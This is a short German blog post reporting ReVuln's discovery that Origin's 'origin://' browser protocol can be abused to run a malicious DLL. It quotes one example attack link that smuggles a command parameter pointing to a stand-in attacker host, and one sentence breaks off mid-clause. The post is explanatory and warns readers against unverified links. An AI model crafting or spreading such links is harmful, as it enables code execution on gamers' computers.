In dem Browser Protocol, das Origin benützt, um über Custom Links mit Hilfe der „origin:” Struktur Spiele zu starten, ist ein Sicherheitsmangel entdeckt worden. Ars Technica berichtet, dass die Forschergruppe ReVuln vorgezeigt hat, wie über einen modifizierten Origin Link, der sich als Spielstart tarnt, ein bösartiges Programm ausgeführt werden kann.
Normalerweise erfordert ein Origin Spiel einen „origin://LaunchGame/[GameID]” Befehl, wenn man es via Browser starten möchte. ReVuln zufolge können Leute mit üblen Absichten diesen Pfad einfach in etwas wie „origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll” verändern, so den Befehl vergiften und so dafür sorgen, dass eine fremde DLL
Zusätzlich zu einem umfangreichen Artikel über die Erkenntnisse hat ReVuln auch ein kurzes Video ins Netz gestellt, das den Exploit in Aktion zeigt.
Als Reaktion auf den Bericht von Ars Technica ließ EA wissen: „Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”
Dieses Problem ist allerdings nicht auf Origin beschränkt – andere Programme, die ebenfalls diese Art von Protokoll benützen, darunter auch Steam, sind genauso für Attacken anfällig.
Das Problem ist dasselbe wie bei jeder anderen Phishing Attacke, die über veränderte Links oder an Emails angehängte Trojaner gestartet werden. Das Sicherste ist, nie auf nicht überprüfte Links zu klicken, die seltsam aussehende Parameter enthalten, egal ob es sich um einen Origin Launch oder etwas anderes handelt. Oder, mit den Worten von Dr. Breen: „Be wise. Be safe. Be aware.”
Keine Kommentare:
Kommentar veröffentlichen